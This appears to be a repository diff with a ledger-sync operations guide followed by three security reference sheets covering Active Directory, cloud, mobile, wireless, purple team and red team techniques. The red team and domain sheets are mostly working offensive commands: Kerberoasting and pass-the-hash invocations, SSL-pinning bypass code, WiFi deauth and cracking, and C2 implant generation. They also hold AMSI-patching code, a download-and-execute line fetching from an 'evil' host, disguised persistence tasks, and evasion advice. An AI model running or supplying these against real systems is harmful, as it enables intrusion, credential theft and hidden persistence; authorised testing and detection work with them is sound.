**Trigger:** Foreign `node_id` differs from previous
**Signals:** `"IDENTITY_SHIFT"` warning
**Impact:** Node re-provisioned, restored, or compromised
### CLOCK_DRIFT_SUSPECT / CLOCK_DRIFT_SEVERE (WARNING / CRITICAL)
**Trigger:** Foreign timestamps deviate from wall-clock
**Impact:** Braid ordering may not reflect real-world order
### ANCHOR_DIVERGENCE (CRITICAL)
**Trigger:** External anchors don't match internal roots
**Impact:** Post-anchor tampering or misconfiguration
### FLOOD_SUSPECT (INFO/WARNING)
**Trigger:** Repeated identical or trivial updates
**Impact:** Noise, resource waste, possible abusive peer
---
## 6. Incident Runbooks
### ROOT_REGRESSION Runbook
1. **Confirm** — Run `npm run braid:check`, inspect BraidStore
2. **Freeze trust** — Do not treat newer foreign roots as authoritative
3. **Cross-check** — Verify external anchors if any
4. **Coordinate** — Send to foreign operator:
- Last good root (timestamp, proof_count)
- Regressed root and evidence
5. **Document** — Open incident with braid IDs and timeline
6. **Resume** — Only when foreign stabilizes with `source_ts > last_good_ts` AND `proof_count >= last_good_count`
### PROOF_COUNT_REGRESSION Runbook
Same as ROOT_REGRESSION — strong signal of data loss or truncation.
### SCHEMA_INVALID Runbook
1. Fetch foreign `/api/root` manually
2. Identify missing/invalid fields
3. Mark foreign incompatible
4. Open issue to align `schema_version`
5. Reject until fixed
### NETWORK_ERROR Runbook
1. Check local network (DNS, firewall, routing)
2. Verify foreign node reachable
3. Short outages: log, auto-retry
4. Long outages: escalate as CRITICAL
### IDENTITY_SHIFT Runbook
1. Confirm `source_node_id` differs
2. Ask: Planned re-provisioning or unexpected?
3. If planned: treat as new ledger, preserve old history
4. If unplanned: freeze trust, investigate
5. Document decision
---
## 7. API Contracts
### Shield `/api/root`
```json
{
"nodeId": "offsec-mcp-genesis",
"root_hash": "7ad7c892...",
"batch_id": "batch-...",
"proof_count": 142,
"root_txt_sha256": "632904d2...",
"ts": "2025-11-30T17:50:45.362Z"
}
```
### VaultMesh `/api/proof/root`
```json
{
"schema_version": "1.0",
"node_id": "vaultmesh-node-1",
"root_hex": "46b3d021...",
"ts": "2025-11-30T17:50:45.362Z",
"proofchain_id": "proofchain:2025-11-30",
"root_file": "receipts/ROOT.txt",
"proof_count": 142
}
```
---
## 8. BraidStore Record Structure
```json
{
"id": "braid-<timestamp>-<random>",
"ledger_name": "vaultmesh",
"root_hex": "<64-hex>",
"source_node_id": "vaultmesh-node-1",
"source_ts": "2025-11-30T17:45:00.000Z",
"source_url": "http://vaultmesh:9110/api/root",
"proof_count": 142,
"captured_at": "2025-11-30T17:50:00.000Z",
"proof_id": "proof-abc123",
"schema_version": "1.0",
"kind": "import", // import | repeat | rejected
"status": "ok", // ok | warning | rejected
"warnings": [],
"parent_braid_id": null,
"local_root_hex_at_import": "<ShieldRootAtCapture>",
"local_receipt_index": 123,
"created_at": "2025-11-30T17:50:00.000Z"
}
```
---
## 9. Braid Hash Computation
```
BRAID_HASH = SHA256( L_root || F_root || captured_at )
```
Where:
- `L_root` — local Merkle root at capture
- `F_root` — foreign root imported
- `captured_at` — RFC3339 timestamp
---
## 10. Chaos Drills
### Drill A — Happy Path
1. Start mock: `npm run mock:vaultmesh`
2. Import: `proof_braid_import` with normal URL
3. Validate: `npm run braid:check` → "no issues"
4. Check ROOT.txt has `## Foreign Roots` section
### Drill B — Regression Attack
1. First import from `?mode=normal`
2. Second import from `?mode=regress`
3. Validate: `npm run braid:check` → reports issues
4. Inspect: BraidStore shows `status: "rejected"`, warnings
### Drill B+ — Recovery
5. Import normal again
6. Latest entry should have `status: "ok"`, greater timestamps
---
## 11. Agent Automation
```yaml
name: braid_sync
trigger:
type: schedule
interval_seconds: 300
actions:
- tool: proof_braid_import
args: {url: "${vaultmesh_url}", ledger_name: "vaultmesh"}
- tool: proof_braid_emit
args: {target_ledger: "vaultmesh"}
- tool: proof_root
args: {}
on_complete: log
enabled: false
```
### Safety Rails
- **Allowed hosts:** Validate URLs against allow-list
- **Minimum interval:** Enforce ≥60 seconds
- **No auto-healing:** Agent must not rewrite or delete entries
---
## 12. Verification
### One-Way Braid Verification
1. Obtain A's ROOT.txt and Merkle root
2. Parse `## Foreign Roots`, find B's entry
3. Fetch proof by `capture_proof_id`
4. Verify proof inclusion in Merkle tree
### Bidirectional Verification
1. Verify A→B (as above)
2. Verify B→A (symmetric)
3. Confirm no invariant violations
### Closed Braid Verification
1. Verify both imports
2. Confirm ordering (t0 < t1 < t2)
3. Each root appears in other's history
---
## 13. External Anchoring
Braid + external anchors (BTC/OTS, ETH) strengthen guarantees:
1. A's root anchored externally
2. B imports A's root
3. Tampering requires rewriting both logs + external anchors
Verify anchors via `proof_anchor_verify` or anchor-specific tools.

View File

@@ -0,0 +1,398 @@
# Specialized Security Domains Reference
Domain-specific techniques for AD, Cloud, K8s, Mobile, Wireless, OT/ICS, and API security.
## Active Directory Security
### Attack Techniques
| Attack | Description | Tools | ATT&CK |
|--------|-------------|-------|--------|
| Kerberoasting | Crack TGS tickets for SPNs | GetUserSPNs.py, Rubeus | T1558.003 |
| AS-REP Roasting | Target accounts without pre-auth | GetNPUsers.py, Rubeus | T1558.004 |
| Pass-the-Hash | Auth with NTLM hash | Mimikatz, Impacket | T1550.002 |
| Pass-the-Ticket | Inject stolen Kerberos tickets | Rubeus, Mimikatz | T1550.003 |
| DCSync | Simulate DC replication | secretsdump.py, Mimikatz | T1003.006 |
| NTLM Relay | Relay captured NTLM auth | ntlmrelayx.py, Responder | T1557.001 |
| Golden Ticket | Forge TGT with KRBTGT hash | Mimikatz, ticketer.py | T1558.001 |
| Silver Ticket | Forge TGS for specific service | Mimikatz, Rubeus | T1558.002 |
### BloodHound
```bash
# Collect data
SharpHound.exe -c All
bloodhound-python -d domain.local -u user -p pass -c All
# Neo4j + BloodHound GUI
neo4j console
bloodhound
```
### Key Queries
- Shortest Path to Domain Admin
- Find Kerberoastable Users
- Unconstrained Delegation Computers
- GPO Abuse Paths
- High Value Targets
### Impacket
```bash
# Kerberoasting
GetUserSPNs.py domain.local/user:pass -request -outputfile hashes.txt
# AS-REP Roasting
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat
# DCSync
secretsdump.py domain.local/admin:pass@dc.domain.local
# Pass-the-Hash
psexec.py domain.local/admin@target -hashes :NTLM_HASH
wmiexec.py domain.local/admin@target -hashes :NTLM_HASH
```
### Rubeus (Windows)
```powershell
# Kerberoasting
Rubeus.exe kerberoast /outfile:hashes.txt
# AS-REP Roasting
Rubeus.exe asreproast /format:hashcat
# Pass-the-Ticket
Rubeus.exe ptt /ticket:ticket.kirbi
# Request TGT
Rubeus.exe asktgt /user:admin /password:pass
```
## Cloud Security
### AWS Security
#### Common Misconfigurations
- S3 buckets with public access
- Overly permissive IAM policies
- Unencrypted EBS volumes
- Security groups with 0.0.0.0/0
- CloudTrail disabled
#### Tools
```bash
# ScoutSuite - Multi-cloud audit
scout aws
# Prowler - AWS CIS benchmark
prowler
# Pacu - AWS exploitation
pacu
> import_keys
> run iam__enum_users_roles_policies_groups
> run iam__privesc_scan
```
### Azure Security
#### Enumeration
```bash
# ROADtools
roadrecon auth -u user@tenant.onmicrosoft.com -p pass
roadrecon gather
roadrecon gui
# AzureHound (BloodHound)
azurehound -u user@tenant.com -p pass list
```
#### Common Attacks
- App registration abuse
- Managed identity privilege escalation
- Storage account key access
- KeyVault secret extraction
### GCP Security
#### Enumeration
```bash
# GCP IAM enumeration
gcloud projects list
gcloud iam service-accounts list
gcloud compute instances list
# ScoutSuite
scout gcp
```
## Container & Kubernetes Security
### Container Escape Techniques
| Technique | Description | Detection |
|-----------|-------------|-----------|
| Privileged Container | Full host access | Pod security policies |
| hostPID/hostNetwork | Namespace sharing | Admission controllers |
| Mounted /var/run/docker.sock | Docker API access | Falco rules |
| Kernel exploits | CVE-based escapes | Patching, runtime security |
| Writable hostPath | Host filesystem access | PSP/PSA |
### Kubernetes Attack Tools
```bash
# Kube-hunter - Penetration testing
kube-hunter --remote <cluster>
# Kubeaudit - Security audit
kubeaudit all
# Peirates - K8s pentesting
peirates
# kubeletctl - Kubelet exploitation
kubeletctl pods -s <node_ip>
kubeletctl exec /bin/bash -p <pod> -c <container> -s <node_ip>
```
### Falco Rules
```yaml
- rule: Terminal shell in container
desc: A shell was spawned in a container
condition: container and proc.name in (shell_binaries)
output: Shell spawned in container (user=%user.name container=%container.name)
priority: WARNING
tags: [container, shell]
- rule: Sensitive file access
desc: Sensitive file opened for reading
condition: open_read and container and (
fd.name startswith /etc/shadow or
fd.name startswith /etc/passwd
)
output: Sensitive file opened (file=%fd.name container=%container.name)
priority: WARNING
```
### Pod Security Standards
```yaml
# Restricted (production)
apiVersion: v1
kind: Pod
spec:
securityContext:
runAsNonRoot: true
seccompProfile:
type: RuntimeDefault
containers:
- name: app
securityContext:
allowPrivilegeEscalation: false
capabilities:
drop: ["ALL"]
readOnlyRootFilesystem: true
```
## Mobile Security
### Android Testing
#### Tools
- **Frida** — Dynamic instrumentation
- **Objection** — Runtime mobile exploration
- **drozer** — Android security assessment
- **apktool** — APK decompilation
- **jadx** — DEX to Java decompiler
#### Frida
```javascript
// Bypass SSL pinning
Java.perform(function() {
var TrustManager = Java.use('com.android.org.conscrypt.TrustManagerImpl');
TrustManager.verifyChain.implementation = function() {
return Java.use('java.util.ArrayList').$new();
};
});
// Hook method
Java.perform(function() {
var MainActivity = Java.use('com.app.MainActivity');
MainActivity.checkPassword.implementation = function(password) {
console.log('Password: ' + password);
return this.checkPassword(password);
};
});
```
#### Objection
```bash
# Start
objection -g com.app.target explore
# SSL pinning bypass
android sslpinning disable
# Root detection bypass
android root disable
# Dump keychain
android keystore list
```
### iOS Testing
#### Tools
- **Frida** — Dynamic instrumentation
- **Objection** — Runtime exploration
- **class-dump** — Objective-C class extraction
- **Hopper/IDA** — Binary analysis
## Wireless Security
### WiFi Attacks
| Attack | Description | Tools |
|--------|-------------|-------|
| WPA2 Handshake Capture | Capture 4-way handshake | airodump-ng, hashcat |
| PMKID Attack | Clientless capture | hcxdumptool |
| Evil Twin | Fake AP for credential capture | hostapd, eaphammer |
| WPA3 Dragonblood | WPA3 downgrade attacks | dragonslayer |
| Deauth | Force client reconnection | aireplay-ng |
### Aircrack-ng
```bash
# Monitor mode
airmon-ng start wlan0
# Scan networks
airodump-ng wlan0mon
# Target specific network
airodump-ng -c <channel> --bssid <BSSID> -w capture wlan0mon
# Deauth attack
aireplay-ng -0 5 -a <BSSID> -c <CLIENT> wlan0mon
# Crack handshake
aircrack-ng -w wordlist.txt capture.cap
# Or with hashcat
hashcat -m 22000 capture.hc22000 wordlist.txt
```
### PMKID Attack
```bash
# Capture PMKID
hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1
# Convert for hashcat
hcxpcapngtool -o hash.hc22000 capture.pcapng
# Crack
hashcat -m 22000 hash.hc22000 wordlist.txt
```
## Bluetooth & IoT Security
### Bluetooth Tools
- **Ubertooth One** — Bluetooth sniffer
- **BlueMaho** — Bluetooth security testing
- **Bettercap** — BLE attacks
- **GATTacker** — BLE MITM
### BLE Enumeration
```bash
# Scan for devices
hcitool lescan
# Connect and enumerate
gatttool -b <MAC> -I
> connect
> primary
> characteristics
> char-read-hnd <handle>
```
### IoT Firmware Analysis
```bash
# Extract firmware
binwalk -e firmware.bin
# Find strings
strings firmware.bin | grep -i password
# Analyze with Ghidra
ghidraRun
```
## OT/ICS Security
### Protocols
| Protocol | Port | Description |
|----------|------|-------------|
| Modbus | 502 | Industrial control |
| DNP3 | 20000 | SCADA/utility |
| EtherNet/IP | 44818 | Industrial Ethernet |
| OPC UA | 4840 | Industrial interoperability |
| BACnet | 47808 | Building automation |
| S7Comm | 102 | Siemens PLCs |
### Scanning
```bash
# Nmap ICS scripts
nmap -sU -p 502 --script modbus-discover <target>
nmap -p 102 --script s7-info <target>
nmap -sU -p 47808 --script bacnet-info <target>
# Metasploit
use auxiliary/scanner/scada/modbus_findunitid
use auxiliary/scanner/scada/modbusclient
```
### Standards
- **IEC 62443** — Industrial cybersecurity
- **NIST SP 800-82** — ICS security guide
- **NERC CIP** — Critical infrastructure protection
## API Security
### OWASP API Top 10 (2023)
| # | Risk | Description |
|---|------|-------------|
| 1 | Broken Object Level Authorization | Direct object reference |
| 2 | Broken Authentication | Weak auth mechanisms |
| 3 | Broken Object Property Level Authorization | Excessive data exposure |
| 4 | Unrestricted Resource Consumption | No rate limiting |
| 5 | Broken Function Level Authorization | Admin function access |
| 6 | Unrestricted Access to Sensitive Flows | Business logic abuse |
| 7 | Server Side Request Forgery | SSRF via API |
| 8 | Security Misconfiguration | Default configs, CORS |
| 9 | Improper Inventory Management | Shadow APIs |
| 10 | Unsafe Consumption of APIs | Third-party API trust |
### Testing Tools
- **Burp Suite** — Proxy and scanner
- **Postman** — API testing
- **OWASP ZAP** — Security scanner
- **Arjun** — Parameter discovery
- **Kiterunner** — API endpoint discovery
### Common Tests
```bash
# Parameter discovery
arjun -u https://api.target.com/users
# Endpoint discovery
kiterunner scan https://api.target.com -w routes-large.kite
# JWT testing (jwt_tool)
jwt_tool <token> -T
jwt_tool <token> -X a # Algorithm none attack
jwt_tool <token> -I -pc user -pv admin # Claim tampering
```
### JWT Attacks
- **Algorithm None** — Remove signature verification
- **Algorithm Confusion** — RS256 → HS256
- **Key Confusion** — Use public key as HMAC secret
- **Claim Tampering** — Modify payload claims
- **Expired Token Reuse** — Ignore expiration

View File

@@ -0,0 +1,295 @@
# Purple Team Operations Reference
Adversary emulation, detection validation, BAS platforms, and ATT&CK coverage.
## Purple Team Overview
Purple teaming combines Red Team (offensive) and Blue Team (defensive) capabilities in collaborative exercises. Unlike covert red team engagements, purple team exercises are transparent — attacks are announced while defenders monitor logging, alerting, and blocking outcomes in real-time.
| Assessment Type | Approach | Focus |
|-----------------|----------|-------|
| Penetration Testing | Point-in-time vulnerability assessment | Identify vulnerabilities |
| Red Team | Covert adversary simulation | Test incident response |
| Purple Team | Collaborative, transparent | Validate detection capabilities |
| BAS (Automated) | Continuous automated simulation | Control validation |
## Adversary Emulation Frameworks
| Framework | Description | Key Features |
|-----------|-------------|--------------|
| MITRE Caldera | Automated adversary emulation | 527+ procedures, web UI, ATT&CK mapping |
| Atomic Red Team | Atomic test library by Red Canary | 1,225+ tests, 261 techniques, agentless |
| Infection Monkey | Breach simulation by Akamai | Self-propagating, zero-trust validation |
| SCYTHE | Commercial adversary emulation | Custom payloads, threat actor emulation |
| PurpleSharp | Open-source Windows simulation | AD focus, .NET-based, telemetry generation |
| Mordor | Pre-recorded security events | JSON telemetry, ATT&CK-mapped datasets |
## MITRE Caldera
### Installation
```bash
git clone https://github.com/mitre/caldera.git --recursive
cd caldera
pip3 install -r requirements.txt
python3 server.py --insecure
# Access: http://localhost:8888
# Default: red/admin (red team), blue/admin (blue team)
```
### Deploy Sandcat Agent (Windows)
```powershell
$server="http://<CALDERA_IP>:8888"
$url="$server/file/download"
$wc=New-Object System.Net.WebClient
$wc.Headers.add("platform","windows")
$wc.Headers.add("file","sandcat.go")
$data=$wc.DownloadData($url)
[System.IO.File]::WriteAllBytes("C:\Users\Public\sandcat.exe",$data)
C:\Users\Public\sandcat.exe -server $server -group red
```
### Create Operation
1. Navigate to Operations in web UI
2. Create new operation, select adversary profile
3. Choose group (agents), set planner (atomic/batch)
4. Run operation and monitor execution
### Built-in Adversaries
- `Discovery` — Basic recon techniques
- `Credential Access` — Credential harvesting
- `Lateral Movement` — Network pivoting
- `Persistence` — Maintain access
- `Collection` — Data gathering
## Atomic Red Team
### Installation (PowerShell)
```powershell
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)
Install-AtomicRedTeam -getAtomics
# Import module
Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1"
```
### Usage
```powershell
# List tests for technique
Invoke-AtomicTest T1003.001 -ShowDetails
# Execute specific test
Invoke-AtomicTest T1003.001 -TestNumbers 1
# Execute multiple tests
Invoke-AtomicTest T1059.001 -TestNumbers 1,2,3
# Check/install prerequisites
Invoke-AtomicTest T1003.001 -GetPrereqs
# Run all tests for technique
Invoke-AtomicTest T1003.001
# Cleanup after testing
Invoke-AtomicTest T1003.001 -Cleanup
# With logging
Invoke-AtomicTest T1003 -LoggingModule Attire-ExecutionLogger
```
### Common Techniques to Test
| Technique | Description | ATT&CK ID |
|-----------|-------------|-----------|
| OS Credential Dumping | LSASS, SAM, DCSync | T1003 |
| PowerShell | Script execution | T1059.001 |
| Registry Run Keys | Persistence | T1547.001 |
| Scheduled Tasks | Persistence | T1053.005 |
| Process Injection | Defense evasion | T1055 |
| Remote Services | Lateral movement | T1021 |
| Data from Local System | Collection | T1005 |
## Infection Monkey
### Installation
```bash
# Docker
docker pull infectionmonkey/monkey:latest
docker run -d -p 5000:5000 -p 443:443 infectionmonkey/monkey:latest
# Access: https://localhost:5000
```
### Key Features
- Self-propagating breach simulation
- Zero Trust validation
- Network segmentation testing
- Lateral movement visualization
- Compliance reporting (MITRE ATT&CK, Zero Trust)
## BAS Platforms
| Platform | Key Capabilities | Differentiators |
|----------|------------------|-----------------|
| Picus Security | Control validation, threat library | Vendor-specific remediation, 24hr threat SLA |
| Cymulate | Exposure management, attack surface | Modular platform, Gartner top-rated |
| AttackIQ | Security optimization, ATT&CK alignment | Tiered offerings, MITRE partnership |
| SafeBreach | Hacker's Playbook (25K+ attacks) | Breach prediction, custom simulations |
| XM Cyber | Attack path management | Graph-based visualization |
### BAS Workflow
1. **Deploy agents** across infrastructure
2. **Select scenarios** mapped to ATT&CK
3. **Execute simulations** (safe, production-ready)
4. **Analyze results** — what was detected/blocked
5. **Remediate gaps** — tune controls, add detections
6. **Repeat** — continuous validation
## ATT&CK Coverage Measurement
### Gap Analysis Tools
- **VECTR** — Track threat resilience metrics
- **DeTTECT** — Detection coverage mapping
- **ATT&CK Navigator** — Visualize technique coverage
- **MITRE Engenuity** — Evaluation results
### Coverage Documentation
```yaml
technique: T1003.001
name: LSASS Memory
tactic: Credential Access
detection:
status: detected
confidence: high
sources:
- Sysmon Event 10 (Process Access)
- Windows Security Event 4656
- EDR Alert
visibility:
quality: excellent
data_sources:
- Process monitoring
- API monitoring
remediation:
status: blocked
control: Credential Guard enabled
```
### Navigator Layer Export
```json
{
"name": "Detection Coverage",
"versions": {"attack": "14", "navigator": "4.8.2"},
"techniques": [
{"techniqueID": "T1003.001", "score": 100, "color": "#00ff00"},
{"techniqueID": "T1059.001", "score": 75, "color": "#ffff00"},
{"techniqueID": "T1547.001", "score": 50, "color": "#ff9900"}
]
}
```
## Detection Validation Workflow
### Pre-Exercise
1. Review threat intelligence for relevant TTPs
2. Select techniques to test
3. Prepare detection queries and dashboards
4. Brief Blue Team on exercise scope
### During Exercise
1. Red Team executes announced technique
2. Blue Team monitors SIEM/EDR
3. Document detection status:
- **Detected** — Alert triggered
- **Logged** — Event captured, no alert
- **Missed** — No telemetry
- **Blocked** — Prevention control worked
4. Capture artifacts and timestamps
### Post-Exercise
1. Analyze gaps in detection/visibility
2. Create or tune detection rules
3. Update coverage documentation
4. Schedule remediation and re-testing
## Sigma Rule Development Workflow
### From Atomic Test to Detection
1. **Execute Atomic Test**
```powershell
Invoke-AtomicTest T1003.001 -TestNumbers 1
```
2. **Capture Telemetry**
- Sysmon events
- Windows Security events
- EDR alerts
3. **Identify Detection Opportunities**
- Process creation with specific arguments
- File access patterns
- Network connections
4. **Write Sigma Rule**
```yaml
title: Procdump LSASS Dump
detection:
selection:
Image|endswith: '\procdump.exe'
CommandLine|contains: 'lsass'
condition: selection
level: high
```
5. **Convert to SIEM Format**
```bash
sigma convert -t splunk -p sysmon rule.yml
```
6. **Validate in Production**
- Deploy rule
- Re-run atomic test
- Confirm alert triggers
7. **Document and Iterate**
## Detection Sprints
### Sprint Structure (2 weeks)
- **Week 1:** Focus on 3-5 priority techniques
- Day 1-2: Execute atomics, capture telemetry
- Day 3-4: Develop detection rules
- Day 5: Test and tune
- **Week 2:** Validation and documentation
- Day 1-2: Production validation
- Day 3-4: Gap analysis, coverage update
- Day 5: Retrospective, plan next sprint
### Prioritization Criteria
1. Threat intelligence (adversaries targeting org)
2. Risk assessment (business impact)
3. ATT&CK prevalence (commonly used techniques)
4. Existing gaps (low coverage areas)
5. Quick wins (easy to detect)
## Metrics
### Detection Metrics
| Metric | Description |
|--------|-------------|
| Mean Time to Detect (MTTD) | Average time from attack to detection |
| Detection Rate | % of techniques detected |
| False Positive Rate | Alerts without true incidents |
| Coverage Score | % of relevant ATT&CK techniques covered |
### Improvement Tracking
```yaml
sprint: 2024-Q4-S1
techniques_tested: 15
techniques_detected: 12
detection_rate: 80%
new_rules_created: 8
rules_tuned: 5
false_positives_reduced: 12
coverage_delta: +5%
```

View File

@@ -0,0 +1,294 @@
# Red Team Operations Reference
C2 frameworks, evasion techniques, persistence, lateral movement, and OPSEC.
## C2 Framework Comparison
| Framework | Type | Protocols | Key Features |
|-----------|------|-----------|--------------|
| Cobalt Strike | Commercial | HTTP/S, DNS, SMB | Beacon, Malleable C2, Aggressor scripting |
| Sliver | Open Source | mTLS, HTTP/S, DNS, WG | Cross-platform, multiplayer, Armory extensions |
| Havoc | Open Source | HTTP/S, SMB, TCP | Demon agents, stack duplication, GUI |
| Brute Ratel C4 | Commercial | HTTP/S, DNS, DoH | EDR evasion, syscall obfuscation |
| Mythic | Open Source | TCP, HTTP, DNS, SMB | Web UI, multi-agent, Apollo/Apfell |
| Empire | Open Source | HTTP/S, Dropbox | PowerShell/Python agents |
| Nighthawk | Commercial | HTTP/S, DNS | OPSEC-focused, highly evasive |
## Sliver C2
### Installation
```bash
# Linux/macOS
curl https://sliver.sh/install | sudo bash
# Or from GitHub
wget https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_linux
chmod +x sliver-server_linux
./sliver-server_linux
```
### Systemd Service
```bash
cat > /etc/systemd/system/sliver.service << EOL
[Unit]
Description=Sliver C2 Server
After=network.target
[Service]
Type=simple
Restart=always
ExecStart=/opt/sliver/sliver-server daemon
[Install]
WantedBy=multi-user.target
EOL
systemctl daemon-reload && systemctl enable --now sliver
```
### Multiplayer Setup
```bash
./sliver-server operator -l <teamserver_ip> -p <port> -n <username> -s /tmp/operator.cfg
sliver-client import /tmp/operator.cfg
```
### Listeners
```
sliver > mtls -l 443 # Mutual TLS
sliver > https -l 8443 # HTTPS
sliver > dns -d example.com # DNS
sliver > wg -l 51820 # WireGuard
```
### Implant Generation
```
# Interactive sessions
sliver > generate --mtls 10.0.0.1:443 --os windows --arch amd64 --format exe --save /tmp/implant.exe
sliver > generate --http 10.0.0.1:8443 --os linux --format shared --save /tmp/implant.so
sliver > generate --dns example.com --os windows --format shellcode --save /tmp/implant.bin
# Beacons (async, stealthier)
sliver > generate beacon --mtls 10.0.0.1:443 --os windows --format exe --seconds 30 --jitter 10
# With evasion
sliver > generate --mtls 10.0.0.1:443 --os windows --format shellcode --evasion sgn,checkvm,sleep
```
### Post-Exploitation
```
sliver > sessions # List sessions
sliver > use <session_id> # Interact
sliver (IMPLANT) > info # System info
sliver (IMPLANT) > whoami # Current user
sliver (IMPLANT) > ps # Processes
sliver (IMPLANT) > netstat # Network
sliver (IMPLANT) > getprivs # Privileges
sliver (IMPLANT) > getsystem # Elevate to SYSTEM
sliver (IMPLANT) > hashdump # SAM hashes
sliver (IMPLANT) > mimikatz # Mimikatz BOF
sliver (IMPLANT) > portfwd add -r 10.0.0.5:3389 -b 127.0.0.1:13389
sliver (IMPLANT) > upload /local/file /remote/path
sliver (IMPLANT) > download /remote/file /local/path
sliver (IMPLANT) > screenshot
```
## Havoc C2
### Installation
```bash
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc
# Dependencies (Ubuntu/Debian)
sudo apt install -y git build-essential cmake libfontconfig1 \
libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev \
libncurses5-dev libgmp-dev libpython3-dev python3-pip golang-go
# Build
cd teamserver && go mod download && cd ..
make ts-build
make client-build
```
### Profile (havoc.yaotl)
```hcl
Teamserver {
Host = "0.0.0.0"
Port = 40056
Build { Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc" }
}
Operators {
user "operator1" { Password = "password123" }
}
Listeners {
Http { Name = "HTTPS"; Host = "10.0.0.1"; Port = 443; Secure = true }
}
```
### Start
```bash
./havoc server --profile ./profiles/havoc.yaotl
./havoc client
```
### Demon Commands
```
demon > shell whoami
demon > ps
demon > screenshot
demon > download C:\secrets.txt
demon > upload /tmp/tool.exe C:\temp\
demon > inject <PID> <shellcode>
demon > token steal <PID>
demon > hashdump
demon > net localgroup administrators
demon > net logons
```
## AMSI & EDR Evasion
### Techniques
| Technique | Description | ATT&CK |
|-----------|-------------|--------|
| AMSI Memory Patching | Overwrite AmsiScanBuffer | T1562.001 |
| AMSI Reflection | Set amsiInitFailed via .NET | T1562.001 |
| ETW Patching | Disable Event Tracing | T1562.001 |
| Direct Syscalls | Bypass usermode hooks | T1106 |
| DLL Unhooking | Restore clean NTDLL | T1562.001 |
| Sleep Obfuscation | Encrypt payload during sleep | T1497 |
| DLL Side-Loading | Abuse signed EXE | T1574.002 |
### AMSI Bypass (PowerShell)
```powershell
# Reflection bypass
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Memory patching
$Win32 = @"
using System; using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")] public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$addr = [Win32]::GetProcAddress([Win32]::LoadLibrary("amsi.dll"), "AmsiScanBuffer")
$p = 0; [Win32]::VirtualProtect($addr, [uint32]5, 0x40, [ref]$p)
$patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $addr, 6)
# PowerShell downgrade (if v2 available)
powershell.exe -Version 2 -Command "IEX (New-Object Net.WebClient).DownloadString('http://evil/script.ps1')"
```
### Syscall Tools
- **SysWhispers3** — Generate syscall stubs
- **Hell's Gate** — Dynamic syscall resolution
- **Halo's Gate** — Unhook + syscall
## Persistence Mechanisms
| Technique | Location | ATT&CK |
|-----------|----------|--------|
| Registry Run Keys | HKCU/HKLM\...\Run | T1547.001 |
| Scheduled Tasks | TaskCache registry | T1053.005 |
| Startup Folder | AppData\...\Startup | T1547.001 |
| WMI Subscription | WMI Repository | T1546.003 |
| DLL Hijacking | App directories | T1574.001 |
| IFEO Debugger | Image File Execution Options | T1546.012 |
| Services | HKLM\...\Services | T1543.003 |
| COM Hijacking | HKCU\Software\Classes\CLSID | T1546.015 |
### Implementation
```powershell
# Registry Run Key
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "C:\Users\Public\implant.exe" /f
# Scheduled Task (SYSTEM)
schtasks /create /sc minute /mo 30 /tn "WindowsDefenderUpdate" /tr "C:\Windows\Temp\beacon.exe" /ru SYSTEM
# PowerShell Scheduled Task
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-w hidden -ep bypass -f C:\temp\beacon.ps1"
$trigger = New-ScheduledTaskTrigger -AtLogOn
$principal = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
Register-ScheduledTask -TaskName "SecurityHealthCheck" -Action $action -Trigger $trigger -Principal $principal
# Startup Folder
copy C:\temp\implant.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
```
## Lateral Movement
| Technique | Tools | ATT&CK |
|-----------|-------|--------|
| PsExec | Impacket, PsExec | T1569.002 |
| WMI Execution | wmiexec.py, wmic | T1047 |
| SMB Exec | smbexec.py, CrackMapExec | T1021.002 |
| Pass-the-Hash | Mimikatz, Impacket | T1550.002 |
| Pass-the-Ticket | Rubeus, Mimikatz | T1550.003 |
| DCOM | dcomexec.py | T1021.003 |
| WinRM | Evil-WinRM, PSSession | T1021.006 |
| RDP Hijacking | tscon, mimikatz | T1563.002 |
### Impacket
```bash
# PsExec
psexec.py DOMAIN/user:password@TARGET cmd.exe
psexec.py DOMAIN/user@TARGET -hashes :NTLM_HASH cmd.exe
# WMI (stealthier)
wmiexec.py DOMAIN/user:password@TARGET
wmiexec.py DOMAIN/user@TARGET -hashes :NTLM_HASH
# SMB
smbexec.py DOMAIN/user:password@TARGET
# DCOM
dcomexec.py DOMAIN/user:password@TARGET
```
### CrackMapExec
```bash
# Spray credentials
crackmapexec smb 10.0.0.0/24 -u user -p password
# Pass-the-Hash
crackmapexec smb 10.0.0.5 -u admin -H NTLM_HASH --local-auth
# Execute commands
crackmapexec smb 10.0.0.5 -u admin -p password -x "whoami"
# Dump SAM
crackmapexec smb 10.0.0.5 -u admin -p password --sam
```
### Evil-WinRM
```bash
evil-winrm -i TARGET -u user -p password
evil-winrm -i TARGET -u user -H NTLM_HASH
```
## OPSEC Guidelines
### Infrastructure
- Use redirectors (Apache mod_rewrite, nginx)
- Domain fronting where available
- Separate long-haul and short-haul C2
- Burn infrastructure after operations
### Traffic
- Use legitimate-looking User-Agents
- Mimic expected traffic patterns
- Avoid beaconing on round intervals (use jitter)
- Encrypt all C2 traffic
### Host
- Clean up artifacts (logs, tools, temp files)
- Use memory-only payloads where possible
- Avoid touching disk
- Timestamp stomp artifacts
### Detection Avoidance
- Know your target's EDR/AV stack
- Test payloads against target defenses
